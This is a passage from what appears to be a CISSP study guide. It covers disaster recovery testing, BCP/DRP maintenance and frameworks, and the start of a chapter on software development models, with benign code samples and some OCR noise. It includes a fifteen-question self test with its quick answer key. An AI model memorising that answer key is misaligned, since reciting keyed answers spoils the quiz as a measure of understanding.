facility, does the site in question have an adequate number of tape drives on-hand 
to carry out the recovery in the indicated window of time? The read-through test is 
often performed concurrently with the structured walkthrough or tabletop testing as 
a solid first testing threshold. The read-through test is focused on ensuring that the 
organization has, or can acquire in a timely fashion, sufficient level resources on 
which their successful recovery is dependent. 

Walkthrough/Tabletop 

Another test that is commonly completed at the same time as the checklist test is that of 
the walkthrough, which is also often referred to as a structured walkthrough or tabletop 
exercise. During this type of DRP test, usually performed prior to more in-depth testing, 
the goal is to allow individuals who are knowledgeable about the systems and services 
targeted for recovery to thoroughly review the overall approach. The term structured 
walkthrough is illustrative, as the group will talk through the proposed recovery 
procedures in a structured manner to determine whether there are any noticeable 
omissions, gaps, erroneous assumptions, or simply technical missteps that would 
hinder the recovery process from successfully occurring. Some structured walkthrough 
and tabletop exercises will introduce various disaster scenarios to ensure that the 
plan accommodates the different scenarios. Obviously, any shortcomings discovered 
through this testing process will be noted for inclusion in an updated recovery plan. 

Simulation Test/Walkthrough Drill 

A simulation test, also called a walkthrough drill (not to be confused with the 
discussion-based structured walkthrough), goes beyond talking about the process 
and actually has teams to carry out the recovery process. A pretend disaster is simu- 
lated to which the team must respond as they are directed to by the DRP. The scope 
of simulations will vary significantly, and tend to grow to be more complicated, 
and involve more systems, as smaller disaster simulations are successfully managed. 
Though some will see the goal as being able to successfully recover the systems 
impacted by the simulation, ultimately the goal of any testing of a DRP is to help 
ensure that the organization is well prepared in the event of an actual disaster. 

Parallel Processing 

Another type of DRP test is that of parallel processing. This type of test is com- 
mon in environments where transactional data is a key component of the critical 
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business processing. Typically, this test will involve recovery of critical processing 
components at an alternate computing facility, and then restore data from a previous 
backup. Note that regular production systems are not interrupted. 

The transactions from the day after the backup are then run against the newly 
restored data, and the same results achieved during normal operations for the date 
in question should be mirrored by the recovery system’s results. Organizations that 
are highly dependent upon mainframe and midrange systems will often employ this 
type of test. 

Partial and Complete Business Interruption 

Arguably, the highest fidelity of all DRP tests involves business interruption test- 
ing. However, this type of test can actually be the cause of a disaster, so extreme 
caution should be exercised before attempting an actual interruption test. As the 
name implies, the business interruption style of testing will have the organization 
actually stop processing normal business at the primary location, and will instead 
leverage the alternate computing facility. These types of tests are more common 
in organizations where fully redundant, often load-balanced, operations already 
exist. 


NOTE 

Each DRP testing method varies in complexity and cost, and simpler tests are less expensive. Here 
is how the plans are ranked in order of cost and complexity, from low to high: 

• DRP Review 

• Read-Through/Checklist/Consistency 

• Structured Walkthrough/Tabletop 

• Simulation Test/Walkthrough Drill 

• Parallel Processing 

• Partial Interruption 

• Complete Business Interruption 


TRAINING 

Although there is an element of DRP training that comes as part of performing 
the tests discussed above, there is certainly a need for more detailed training on 
some specific elements of the DRP process. Another aspect of training is to ensure 
adequate representation on staff of those trained in basic first aid and CPR. 

Starting Emergency Power 

Though it might seem simple, converting a datacenter to emergency power, such as 
backup generators that will begin taking the load as the UPS fail, is not to be taken 
lightly. Specific training and testing of changing over to emergency power should be 
regularly performed. 
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Calling Tree Training/Test 

Another example of combination training and testing is in regard to calling trees, 
which was discussed previously in the “Call Trees” section. The hierarchical rela- 
tionships of calling trees can make outages in the tree problematic. Individuals with 
calling responsibilities are typically expected to be able to answer within a very short 
time period, or otherwise make arrangements. 


AWARENESS 

Even for those members who have little active role with respect to the overall recov- 
ery process, there is still the matter of ensuring that all members of an organization 
are aware of the organization’s prioritization of safety and business viability in the 
wake of a disaster. Awareness training helps to address these matters. 


NOTE 

DRP training and awareness must also address the role that employees perform during disruptive 
events that pose a threat to human safety. Evacuation procedures are an example of this necessary 
training and awareness. For additional information on training and awareness directly related to 
safety concerns, review the Safety Training and Awareness section in Chapter 4, Domain 3: Security 
Engineering. 


CONTINUED BCP/DRP MAINTENANCE 

Once the initial BCP/DRP plan is completed, tested, trained, and implemented, it 
must be kept up to date. Business and IT systems change quickly, and IT profession- 
als are accustomed to adapting to that change. BCP/DRP plans must keep pace with 
all critical business and IT changes. 


CHANGE MANAGEMENT 

The change management process was discussed in depth previously in this chapter. 
This process is designed to ensure that security is not adversely affected as systems 
are introduced, changed, and updated. Change Management includes tracking and 
documenting all planned changes, formal approval for substantial changes, and 
documentation of the results of the completed change. All changes must be auditable. 

The change control board manages this process. The BCP team should be a mem- 
ber of the change control board, and attend all meetings. The goal of the BCP team’s 
involvement on the change control board is to identify any changes that must be 
addressed by the BCP/DRP plan. 
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BCP/DRP VERSION CONTROL 

Once the Business Continuity Plan and associated plans (such as the Disaster Recov- 
ery Plan) are completed, they will be updated routinely. Any business or operational 
change to systems documented by the BCP and related plans must be reflected in 
updated plans. Version control becomes critical. For example: the team handling a 
disaster should not be working on an outdated copy of the DRP 

Any updates to core BCP/DRP plans should be sent to all BCP/DRP team 
members. The updates should include a clear cancellation section to remove any 
ambiguity over which version of the plan is in effect. Many DRP members will keep 
hardcopies of the plans in binders: there must be a process to manage updates to 
printed materials as well. 


BCP/DRP MISTAKES 

Business continuity and disaster recovery planning are a business’ last line of defense 
against failure. If other controls have failed, BCP/DRP is the final control. If it fails, 
the business may fail. 

The success of BCP/DRP is critical, but many plans fail. The BCP team should 
consider the failure of other organizations’ plans, and view their own under intense 
scrutiny. They should ask themselves this question: “Have we made mistakes that 
threaten the success of our plan?” 

Common BCP/DRP mistakes include: 

• Lack of management support 

• Lack of business unit involvement 

• Lack of prioritization among critical staff 

• Improper (often overly narrow) scope 

• Inadequate telecommunications management 

• Inadequate supply chain management 

• Incomplete or inadequate crisis management plan 

• Lack of testing 

• Lack of training and awareness 

• Failure to keep the BCP/DRP plan up to date 


SPECIFIC BCP/DRP FRAMEWORKS 

Given the patchwork of overlapping terms and processes used by various BCP/DRP 
frameworks, this chapter focused on universal best practices, without attempting 
to map to a number of different (and sometimes inconsistent) terms and processes 
described by various BCP/DRP frameworks. 

A handful of specific frameworks are worth discussing, including NIST SP 
800-34, ISO/IEC-27031, and BCI. 
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NIST SP 800-34 

The National Institute of Standards and Technology (NIST) Special Publication 
800-34 Rev. 1 “Contingency Planning Guide for Federal Information Systems” may 
be downloaded at http://csrc.nist.gov/publications/nistpubs/800-34-revl/sp800-34- 
revl_errata-Novl l-2010.pdf. The document is of high quality and in public domain. 
Plans can sometimes be significantly improved by referencing SP 800-34 when 
writing or updating a BCP/DRP. 

IS0/IEC-27031 

ISO/IEC-27031 is a new guideline that is part of the ISO 27000 series, which also 
includes ISO 27001 and ISO 27002 (discussed in Domain 2: Asset Security). ISO/ 
IEC 27031 focuses on BCP (DRP is handled by another framework; see below). 

The formal name is “ISO/IEC 27031:2011 Information technology - Security 
techniques - Guidelines for information and communication technology readiness for 
business continuity.” According to http://www.iso27001security.com/html/27031. 
html, ISO/IEC 27031 is designed to: 

• “Provide a framework (methods and processes) for any organization — private, 
governmental, and nongovernmental; 

• Identify and specify all relevant aspects including performance criteria, 
design, and implementation details, for improving ICT readiness as part of the 
organization’s ISMS, helping to ensure business continuity; 

• Enable an organization to measure its continuity, security and hence readiness to 
survive a disaster in a consistent and recognized manner.” [27] 

Terms and acronyms used by ISO/IEC 27031 include: 

• ICT — Information and Communications Technology 

• ISMS — Information Security Management System 

A separate ISO plan for disaster recovery is ISO/IEC 24762:2008, “Information 
technology — Security techniques — Guidelines for information and communications 
technology disaster recovery services.” More information is available at http://www. 
iso.org/iso/catalogue_detail.htm?csnumber=41532 

BS-25999 AND ISO 22301 

British Standards Institution (BSI, http://www.bsigroup.co.uk/) released BS-25999, 
which is in two parts: 

• “Part 1, the Code of Practice, provides business continuity management best 
practice recommendations. Please note that this is a guidance document only. 

• Part 2, the Specification, provides the requirements for a Business Continuity 
Management System (BCMS) based on BCM best practice. This is the part of 
the standard that you can use to demonstrate compliance via an auditing and 
certification process.” [28] 
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BS-25999-2 has been replaced with ISO 22301:2012 Societal security - Busi- 
ness continuity management systems - Requirements. “ISO 22301 will supersede 
the original British standard, BS 25999-2 and builds on the success and fundamentals 
of this standard. BS ISO 22301 specifies the requirements for setting up and manag- 
ing an effective business continuity management system (BCMS) for any organiza- 
tion, regardless of type or size. BSI recommends that every business has a system 
in place to avoid excessive downtime and reduced productivity in the event of an 
interruption.” [29] 

Comparing ISO 27031 (discussed in the previous section) and ISO 22301: ISO 
27031 focuses on technical details: “ISO 22301 covers the continuity of business 
as a whole, considering any type of incident as a potential disruption source (e.g., 
pandemic disease, economic crisis, natural disaster, etc.), and using plans, policies, 
and procedures to prevent, react, and recover from disruptions caused by them. These 
plans, policies, and procedures can be classified as two main types: those to continue 
operations if the business is affected by a disruption event, and those to recover the 
information and communication infrastructure if the ICT is disrupted. 

Therefore, you can think of ISO 27031 as a tool to implement the technical part 
of ISO 2230 1 , providing detailed guidance on how to deal with the continuity of ICT 
elements to ensure that the organization’s processes will deliver the expected results 
to its clients.” [30] 

BCI 

The Business Continuity Institute (BCI, http://www.thebci.org/) published a six-step 
Good Practice Guidelines (GPG), most recently updated in 2013: “The Good Prac- 
tice Guidelines (GPG) are the independent body of knowledge for good Business 
Continuity practice worldwide. They represent current global thinking in good Busi- 
ness Continuity (BC) practice and now include terminology from ISO 22301:2012, 
the International Standard for Business Continuity management systems.” [31] GPG 
2013 describes six Professional Practices (PP). 

• Management Practices 

• PP1 Policy & Program Management 

• PP2 Embedding Business Continuity 

• Technical Practices 

• PP3 Analysis 

• PP4 Design 

• PP5 Implementation 

• PP6 Validation [32] 


SUMMARY OF EXAM OBJECTIVES 

In this chapter we have discussed operational security. Operations security concerns 
the security of systems and data while being actively used in a production environ- 
ment. Ultimately operations security is about people, data, media, and hardware; all 
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of which are elements that need to be considered from a security perspective. The 
best technical security infrastructure in the world will be rendered moot if an indi- 
vidual with privileged access decides to turn against the organization and there are no 
preventive or detective controls in place within the organization. 

We also discussed Business Continuity and Disaster Recovery Planning, which 
serve as an organization’s last control to prevent failure. Of all controls, a failed BCP 
or DRP can be most devastating, potentially resulting in organizational failure or 
injury or loss of life. 

Beyond mitigating such stark risks, Business Continuity and Disaster Recovery Plan- 
ning has evolved to provide true business value to organizations, even in the absence 
of disaster. The organizational diligence required to build a comprehensive BCP/DRP 
can pay many dividends, through the thorough understanding of key business process- 
es, asset tracking, prudent backup and recovery strategies, and the use of standards. 
Mapping risk to key business processes can result in preventive risk measures taken in 
advance of any disaster, a process that may avoid future disasters entirely. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . What type of backup is typically obtained during the Response (aka 
Containment) phase of Incident Response? 

A. Incremental 

B. Full 

C. Differential 

D. Binary 

2. What is the primary goal of disaster recovery planning (DRP)? 

A. Integrity of data 

B. Preservation of business capital 

C. Restoration of business processes 

D. Safety of personnel 

3. What business process can be used to determine the outer bound of a Maximum 
Tolerable Downtime? 

A. Accounts receivable 

B. Invoicing 

C. Payroll 

D. Shipment of goods 
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4 . Your Maximum Tolerable Downtime is 48 hours. What is the most cost- 
effective alternate site choice? 

A. Cold 

B. Hot 

C. Redundant 

D. Warm 

5 . A structured walkthrough test is also known as what kind of test? 

A. Checklist 

B. Simulation 

C. Tabletop Exercise 

D. Walkthrough Drill 

6 . Which type of backup will include only those files that have changed since the 
most recent Full backup? 

A. Full 

B. Differential 

C. Incremental 

D. Binary 

7 . Which type of tape backup requires a maximum of two tapes to perform a 
restoration? 

A. Differential backup 

B. Electronic vaulting 

C. Full backup 

D. Incremental backup 

8. What statement regarding the Business Continuity Plan is true? 

A. BCP and DRP are separate, equal plans 

B. BCP is an overarching “umbrella” plan that includes other focused plans 
such as DRP 

C. DRP is an overarching “umbrella” plan that includes other focused plans 
such as BCP 

D. COOP is an overarching “umbrella” plan that includes other focused plans 
such as BCP 

9 . Which HA solution involves multiple systems all of which are online and 
actively processing traffic or data? 

A. Active-active cluster 

B. Active-passive cluster 

C. Database shadowing 

D. Remote journaling 

1 0. What plan is designed to provide effective coordination among the managers 
of the organization in the event of an emergency or disruptive event? 

A. Call tree 

B. Continuity of Support Plan 

C. Crisis Management Plan 

D. Crisis Communications Plan 
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1 1 . Which plan details the steps required to restore normal business operations 
after recovering from a disruptive event? 

A. Business Continuity Planning (BCP) 

B. Business Resumption Planning (BRP) 

C. Continuity of Operations Plan (COOP) 

D. Occupant Emergency Plan (OEP) 

1 2. What metric describes how long it will take to recover a failed system? 

A. Minimum Operating Requirements (MOR) 

B. Mean Time Between Failures (MTBF) 

C. The Mean Time to Repair (MTTR) 

D. Recovery Point Objective (RPO) 

1 3. What metric describes the moment in time in which data must be recovered 
and made available to users in order to resume business operations? 

A. Mean Time Between Failures (MTBF) 

B. The Mean Time to Repair (MTTR) 

C. Recovery Point Objective (RPO) 

D. Recovery Time Objective (RTO) 

14. Maximum Tolerable Downtime (MTD) is comprised of which two metrics? 

A. Recovery Point Objective (RPO) and Work Recovery Time (WRT) 

B. Recovery Point Objective (RPO) and Mean Time to Repair (MTTR) 

C. Recovery Time Objective (RTO) and Work Recovery Time (WRT) 

D. Recovery Time Objective (RTO) and Mean Time to Repair (MTTR) 

1 5. Which level of RAID does NOT provide additional reliability? 

A. RAID 1 

B. RAID 5 

C. RAID 0 

D. RAID 3 


SELF TEST QUICK ANSWER KEY 


1 . 

D 

2. 

D 

3. 

C 

4. 

D 

5. 

C 

6. 

B 

7. 

A 

8 . 

B 

9. 

A 

10 . 

C 

11. 

B 

12 . 

C 

13. 

C 

14. 

C 

15. 

C 
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CHAPTER 


Domain 8: Software 
Development Security 
(Understanding, Applyin 
and Enforcing Software 
Security) 



EXAM OBJECTIVES IN THIS CHAPTER 

• Programming Concepts 

• Application Development Methods 

• Databases 

• Object-Oriented Design and Programming 

• Assessing the Effectiveness of Software Security 

• Artificial Intelligence 


UNIQUE TERMS AND DEFINITIONS 

• Extreme Programming (XP) — an Agile development method that uses pairs of 
programmers who work off a detailed specification 

• Object — A “black box” that combines code and data, and sends and receives 
messages 

• Object-Oriented Programming — changes the older procedural programming 
methodology, and treats a program as a series of connected objects that 
communicate via messages 

• Procedural languages — programming languages that use subroutines, 
procedures and functions 

• Spiral Model — a software development model designed to control risk 

• Systems Development Life Cycle — a development model that focuses on 
security in every phase 

• Waterfall Model — An application development model that uses rigid phases; 
when one phase ends, the next begins 
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INTRODUCTION 

Software is everywhere: not only in our computers, but also in our houses, our cars, 
and our medical devices, and all software programmers make mistakes. As software 
has grown in complexity, the number of mistakes has grown along with it. We will 
learn in this chapter that programmers may make 15-50 mistakes per thousand lines 
of code, but following a programming maturity framework such as the Capability Ma- 
turity Model (CMM) can lower that number to 1 mistake per thousand. That sounds 
encouraging, but remember that the Microsoft Vista operating system has 50 million 
(50,000,000) lines of code. Newer OSs such as Windows 10 likely have more. 

As our software has grown in complexity, the potential impact of a software 
crash has also grown. Many cars are now connected to the Internet and use “fly by 
wire” (software) to control the vehicle: in that case, the gearshift is no longer directly 
mechanically connected to the transmission; instead, it serves as an electronic input 
device, like a keyboard. What if a software crash interrupts I/O? What if someone 
remotely hacks into the car and takes control of it, as demonstrated by Charlie Miller 
and Chris Valasek? [1] 

Developing software that is robust and secure is critical: this chapter will show how 
to do that. We will cover programming fundamentals such as compiled versus inter- 
preted languages, as well as procedural and object-oriented programming languages. 
We will discuss application development models such as the Waterfall Model, Spiral 
Model, and Extreme Programming (XP) and others. We will also discuss newer con- 
cepts such as DevOps, added in the 2015 exam update. We will describe common 
software vulnerabilities, ways to test for them, and maturity frameworks to assess the 
maturity of the programming process and provide ways to improve it. 


PROGRAMMING CONCEPTS 

Let us begin by understanding some cornerstone programming concepts. As com- 
puters have become more powerful and ubiquitous, the process and methods used 
to create computer software has grown and changed. Keep in mind that one method 
is not necessarily better than another: As we will see in the next section, high-level 
languages such as C allow a programmer to write code more quickly than a low-level 
language such as assembly, but code written in assembly can be far more efficient. 
Which is better depends on the need of the project. 

MACHINE CODE, SOURCE CODE AND ASSEMBLERS 

Machine code (also called machine language) is software that is executed directly by 
the CPU. Machine code is CPU-dependent; it is a series of Is and 0s that translate to 
instructions that are understood by the CPU. Source code is computer programming 
language instructions that are written in text that must be translated into machine code 
before execution by the CPU. High-level languages contain English-like instructions 
such as “printf ’ (print formatted). 
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Assembly language is a low-level computer programming language. Assembly 
language instructions are short mnemonics, such as “ADD,” “SUB” (subtract), and 
“JMP” (jump), that match to machine language instructions. An assembler converts 
assembly language into machine language. A disassembler attempts to convert 
machine language into assembly. 

COMPILERS, INTERPRETERS AND BYTECODE 

Compilers take source code, such as C or Basic, and compile it into machine code. 
Here is an example C program “Hello World”: 


int main() 

{ 

printf ( "hello, world"); 


A compiler, such as gcc (the GNU Compiler Collection, see http://gcc.gnu.org) trans- 
lates this high-level language into machine code, and saves the results as an executable 
(such as “hello-world.exe”). Once compiled, the machine language is executed directly 
by the CPU. hello-world.exe is compiled once, and may then be run countless times. 

Interpreted languages differ from compiled languages: interpreted code (such as 
shell code) is compiled on the fly each time the program is run. Here is an example 
of an “Hello World” program written in the interpreted scripting language Perl (see: 
http://www.perl.org): 


# ! /usr/local/bin/perl 
print "Hello World\n"; 

This code is saved as “hello-world.pl.” Each time it is run, the Perl interpreter 
(located at /usr/local/bin/perl in the previous code) translates the Perl instructions into 
machine language. Ifhello-world.pl is run 100 times, it will be compiled 100 times 
(while hello-world.exe was only compiled once). 

Bytecode, such as Java bytecode, is also interpreted code. Bytecode exists as an 
intermediary form (converted from source code), but still must be converted into 
machine code before it may run on the CPU. Java Bytecode is platform-independent 
code that is converted into machine code by the Java Virtual Machine (JVM, see 
Chapter 4, Domain 3: Security Engineering for more information on Java bytecode). 

PROCEDURAL AND OBJECT-ORIENTED LANGUAGES 

Procedural languages (also called procedure-oriented languages ) use subrou- 
tines, procedures, and functions. Examples include Basic, C, Fortran, and Pascal. 
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Object-oriented languages attempt to model the real world through the use of objects 
that combine methods and data. Examples include C++, Ruby, and Python; see the 
“Object Orientation” section below for more information. A procedural language 
function is the equivalent of an object-oriented method. 

The following code shows the beginning “ram()” function, written in C (a proce- 
dural language), from the BSD text-based game Trek. 


void 

ram(ix, iy) 
int ix, iy; 

{ 

int i ; 

char c; 

printf ( "\07RED ALERT\07: collision imminent\n" ) ; 
c = Sect [ix] [iy] ; 
switch (c) 

{ 

case KLINGON: 


printf ("%s rams Klingon at %d,%d\n", Ship . shipname, ix, iy) ; 
killk (ix, iy) ; 
break; 
case STAR: 
case INHABIT: 

printf ( "Yeoman Rand: Captain, isn't it getting hot in here?\n"); 
sleep (2) ; 

printf ("Spock: Hull temperature approaching 550 Degrees Kelvin. \n") ; 
lose (L_STAR) ; 
case BASE: 

printf ("You ran into the starbase at %d,%d\n", ix, iy) ; 
killb (Ship . quadx, Ship.quady); 

/* don't penalize the captain if it wasn't his fault */[ 2 ] 
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This ram() function also calls other functions, including killk(), killb(), and lose(). 
Next is an example of object-oriented Ruby (see: http://ruby-lang.org) code for 
a text adventure game that creates a class called “Verb,” and then creates multiple 
Verb objects. As we will learn in the “Object Orientation” section below, an object 
inherits features from its parent class. 


class Verb 

attr_accessor :name, : description 
def initialize (params) 

@name = params [ :name] 

@description = params [: description] 

end 

end 


# Create verbs 

north = Verb.new( :name => "Move no rth ", :description => "Player moves to the north" ) 

east = Verb. new ( :name => "Move east", : description => "Player moves to the east" ) 

west = Verb. new ( rname => "Move west", : description => "Player moves to the west" ) 

south = Verb. new ( :name => "Move south ", : description => "Player moves to the south" ) 

xyzzy = Verb.new( rname => "Magic word", rdescription => "Player teleports to another location 

in the cave" ) [3] 

Note that coding itself is not testable; these examples are given for illustrative 
purposes. 

FOURTH-GENERATION PROGRAMMING LANGUAGE 

Fourth- generation programming languages (4GL) are computer languages that are 
designed to increase programmer’s efficiency by automating the creation of com- 
puter programming code. They are named “fourth generation” because they can be 
viewed as the fourth step of evolution of computer languages: 

• First-generation language: machine code 

• Second-generation language: assembly 

• Third-generation language: COBOL, C, Basic 

• Fourth-generation language: ColdFusion, Progress 4GL, Oracle Reports 

Fourth-generation languages tend to be Graphical User Interface (GUI)- 
focused; dragging and dropping elements, and then generating code based on the 
results. 4GL languages are usually focused on the creation of databases, reports, 
and websites. 
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COMPUTER-AIDED SOFTWARE ENGINEERING (CASE) 

Computer-Aided Software Engineering (CASE) uses programs to assist in the cre- 
ation and maintenance of other computer programs. Programming has historically 
been performed by (human) programmers or teams: CASE adds software to the pro- 
gramming “team.” 

There are three types of CASE software: 

1 . “Tools: support only specific task in the software-production process. 

2. Workbenches: support one or a few software process activities by integrating 
several tools in a single application. 

3. Environments: support all or at least part of the software production process 
with a collection of Tools and Workbenches.” [4] 

Fourth-generation computer languages, object-oriented languages, and GUIs are 
often used as components of CASE. 


TOP-DOWN VS. BOTTOM-UP PROGRAMMING 

A programmer is tasked with developing software that will play MP3 music 
files. How should the programmer begin conceptualizing the challenge of turning 
bits in a file into music we can hear? Should the programmer start at the “top,” 
thinking about how the music will sound, and how the MP3 player will look and 
behave? Or should the programmer start at the “bottom,” thinking about the low- 
level device drivers required to receive a stream of bits and convert them into 
audio waveforms? 

Top-Down (TD) programming starts with the broadest and highest level require- 
ments (the concept of the final program) and works down towards the low-level tech- 
nical implementation details. Bottom-Up programming is the reverse: it starts with 
the low-level technical implementation details and works up to the concept of the 
complete program. 

Both methods pose risks: what if the Top-Down approach made incorrect 
assumptions on the performance of the low-level devices? On the other hand, 
Bottom-Up risks wasting time by performing lots of programming for features that 
may not be required or implemented in the final product. 

Procedural languages such as C have historically been programmed Top-Down 
style: start with the main program, define the procedures, and work down from there. 
Object-oriented programming typically uses bottom-up design: define the objects, 
and use them to build up to the final program. 


TYPES OF PUBLICLY RELEASED SOFTWARE 

Once programmed, publicly released software may come in different forms (such 
as with or without the accompanying source code) and released under a variety of 
licenses. 
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Open and Closed Source Software 

Closed source software is software typically released in executable form: the source 
code is kept confidential. Examples include Oracle and Microsoft Windows 10. Open 
source software publishes source code publicly. Examples include Ubuntu Linux and 
the Apache web server. Proprietary software is software that is subject to intellectual 
property protections such as patents or copyrights. “Closed source software” and 
“proprietary software” are sometimes used as synonyms, but that is not always true: 
some open source software is also proprietary. 

Free Software, Shareware and Crippleware 

Free software is a controversial term that is defined differently by different groups. 
“Free” may mean it is free of charge to use (sometimes called “free as in beer”), 
or “free” may mean the user is free to use the software in any way they would 
like, including modifying it (sometimes called “free as in liberty”). The two types 
are called gratis and libre, respectively. The confusion derives from the fact that 
“free” carries multiple meanings in English. Software that is both gratis and libre is 
sometimes called free [2] (free squared). 

Freeware is “free as in beer” (gratis) software, which is free of charge to use. 
Shareware is fully functional proprietary software that may be initially used free 
of charge. If the user continues to use the Shareware for a specific period of time 
specified by the license (such as 30 days), the Shareware license typically requires 
payment. Crippleware is partially functioning proprietary software, often with key 
features disabled. The user is typically required to make a payment to unlock the full 
functionality. 

Software Licensing 

Software may be released into the public domain, meaning it is (expressly) not copy- 
righted or licensed. This places no intellectual property constraints of the software’s 
users. Some free (libre) software falls into this category. Software licensing protects 
most software, both closed and open source. 

Proprietary software is usually copyrighted (and possibly patented, see Chapter 2, 
Domain 1 : Security and Risk Management for more information on copyrights and 
patents); the users of the software must usually agree to the terms of the software 
licensing agreement before using the software. These agreements are often called 
EULAs (End-User License Agreements), which can be in paper or electronic form, 
and the latter are usually agreed to when the user clicks “I agree” while installing 
the software. 

Open source software may be protected by a variety of licensing agreements, 
including the GNU Public License (GPL), BSD (Berkeley Software Distribution), 
and Apache (named after the Apache Software Foundation) licenses. 

The most prevalent of open source licenses is the GPL, which focuses on free 
(libre) software, allowing users the freedom to use, change, and share software. 
The core of the GPL is the term “copyleft,” a play on copyright: copyleft seeks 
to ensure that free (libre) software remains free. A Quick Guide to GPLv3 (see: 
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http://www.gnu.org/licenses/quick-guide-gplv3.html) states: “Nobody should 
be restricted by the software they use. There are four freedoms that every user 
should have: 

• The freedom to use the software for any purpose, 

• The freedom to change the software to suit your needs, 

• The freedom to share the software with your friends and neighbors, and 

• The freedom to share the changes you make.” [5] 

The GPL copyleft requires modifications to GPL software to remain free: you 
cannot take GPL code, alter it, and make the altered code proprietary. Other free 
licenses, such as BSD, allow licensed code to become proprietary. 


APPLICATION DEVELOPMENT METHODS 

Computer programming dates to the dawn of electronic computers, in the late 1940s. 
Programmers first used machine code or assembly; the first high-level programming 
language was Fortran, which debuted in 1954. The original computer programmers 
often worked alone, creating entire programs as a solo effort. In that case, project 
management methodologies were simple or unnecessary: the programmer could 
sometimes conceptualize the entire project in (human) memory, and then simply 
write the code. As software has grown in complexity, software programming has 
increasingly become a team effort. Team-based projects require project management: 
providing a project framework with deliverables and milestones, divvying up tasks, 
team communication, progress evaluation and reporting, and (hopefully) a final 
delivered product. 

Ultimately, large application development projects may closely resemble proj- 
ects that have nothing to do with software, like making widgets or building bridg- 
es. Application development methods such as the Waterfall and Spiral Models are 
often close cousins to non-programming models. These methods can be thought of 
as project management methods, with additional features to support the creation 
of code. 

WATERFALL MODEL 

The Waterfall Model is a linear application development model that uses rigid phases; 
when one phase ends, the next begins. The Waterfall Model predates software design 
and was first used in manufacturing. It was first used to describe a software devel- 
opment process in 1969, when large software projects had become too complex to 
design using informal methods. Steps occur in sequence, and the unmodified waterfall 
model does not allow developers to go back to previous steps. It is called the 
waterfall because it simulates water falling: it cannot go back up. 

Dr. Winston W. Royce first described the Waterfall Model in relation to devel- 
oping software in “Managing the Development of Large Software Systems” (see: 
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FIGURE 9.1 Unmodified Waterfall Development Model [6] 


http://leadinganswers.typepad.com/leading_answers/files/original_waterfall_paper_ 
winston_royce.pdf). Royce’s unmodified waterfall (with no iteration, sometimes 
called “stagewise”) is shown in Figure 9.1, and includes the following steps: System 
requirements. Software Requirements, Analysis, Program Design, Coding, Testing, 
and Operations. 

Royce’s paper did not use the term “waterfall,” but he described the process. An 
unmodified waterfall does not allow iteration: going back to previous steps. This 
places a heavy planning burden on the earlier steps. Also, since each subsequent step 
cannot begin until the previous step ends, any delays in earlier steps cascade through 
to the later steps. 

Ironically, Royce’s paper was a criticism of the model. Regarding the model 
shown in Figure 9.1, “the implementation described above is risky and invites 
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failure.” [7] In the real world, iteration is required: it is not (usually) realistic to pro- 
hibit a return to previous steps: Royce raised the issue of discovering a fundamental 
design error during the testing phase: “The testing phase which occurs at the end 
of the development cycle is the first event for which timing, storage, input/output 
transfers, etc., are experienced as distinguished from analyzed. These phenomena are 
not precisely analyzable ...Yet if these phenomena fail to satisfy the various external 
constraints, then invariably a major redesign is required.” [8] Many subsequent soft- 
ware design models are called iterative models: they are explicitly designed to allow 
iteration: a return to previous steps. 


EXAM WARNING 


The specific names of the phases of Royce’ s unmodified Waterfall Model are not specifically 
testable: learn the overall flow. Also, Royce omitted a critical final step: destruction. No development 
process that leads to an operational system with sensitive production data is truly complete until 
that system has been retired, the data archived, and the remaining data on those physical systems 
securely destroyed. 


Royce described a modified waterfall model that allowed a return to a previ- 
ous phase for verification or validation, ideally confined to connecting steps. Barry 
Boehm’s paper “A Spiral Model of Software Development and Enhancement” (see 
“Spiral Model” section below) shows a modified waterfall based on Royce’s paper, 
shown in Figure 9.2. 

Others have proposed similar modifications, or broadening the waterfall model. 
The Sashimi Model is based on (and a reaction to) the Waterfall Model. 


NOTE 

The unmodified Waterfall Model does not allow going back. The modified Waterfall Model allows 
going back at least one step. 


SASHIMI MODEL 

The Sashimi Model has highly overlapping steps; it can be thought of as a real-world 
successor to the Waterfall Model (and is sometimes called the Sashimi Waterfall 
Model). It is named after the Japanese delicacy Sashimi, which has overlapping lay- 
ers of fish (and also a hint for the exam). The model is based on the hardware design 
model used by Fuji-Xerox: “Business scholars and practitioners were asking such 
questions as ‘What are the key factors to the Japanese manufacturers’ remarkable 
successes?’ and ‘What are the sources of their competitive advantage?’ The sashimi 
system seems to give answers to these questions.” [10] 
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FIGURE 9.2 Modified Waterfall Development Model [9] 


Peter DeGrace described Sashimi in relation to software development in his book 
“Wicked problems, righteous solutions: a catalogue of modern software.” Sashimi’s 
steps are similar to the Waterfall Model’s; the difference is the explicit overlapping, 
shown in Figure 9.3. 

AGILE SOFTWARE DEVELOPMENT 

Agile Software Development evolved as a reaction to rigid software development 
models such as the Waterfall Model. Agile methods include Scrum and Extreme 
Programming (XP). The Agile Manifesto (see: http://agilemanifesto.org/) states: 
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FIGURE 9.3 The Sashimi Model [11] 


“We are uncovering better ways of developing software by doing it and helping 
others do it. Through this work we have come to value: 

• Individuals and interactions over processes and tools 

• Working software over comprehensive documentation 

• Customer collaboration over contract negotiation 

• Responding to change over following a plan” [12] 

Agile embodies many modern development concepts, including more flexibility, 
fast turnaround with smaller milestones, strong communication within the team, and 
more customer involvement. 

Scrum 

The Scrum development model (named after a scrum in the sport of rugby) is an 
Agile model first described in “The New New Product Development Game” by 
Hirotaka Takeuchi and Ikujiro Nonaka in relation to product development; they 
said “Stop running the relay race and take up rugby.” [13] The “relay race” is 
the waterfall, where teams hand work off to other teams as steps are completed. 
They suggested: “Instead, a holistic or ‘rugby’ approach where a team tries to go 
the distance as a unit, passing the ball back and forth may better serve today’s 
competitive requirements.” [14] 

Peter DeGrace (of Sashimi fame) described (and named) Scrum in relation to 
software development. Scrums contain small teams of developers, called the Scrum 
Team. The Scrum Master, a senior member of the organization who acts like a coach 
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for the team, supports the Scrum Team. Finally, the Product Owner is the voice of 
the business unit. 

Extreme Programming (XP) 

Extreme Programming (XP) is an Agile development method that uses pairs 
of programmers who work off a detailed specification. There is a high level of 
customer involvement. “Extreme Programming improves a software project in 
five essential ways, communication, simplicity, feedback, respect, and courage. 
Extreme Programmers constantly communicate with their customers and fellow 
programmers. They keep their design simple and clean. They get feedback by 
testing their software starting on day one. They deliver the system to the customers 
as early as possible and implement changes as suggested.” [15]. XP core practices 
include: 

• Planning: specifies the desired features, which are called the User Story. 

They are used to determine the iteration (timeline) and drive the detailed 
specifications. 

• Paired programming: programmers work in teams. 

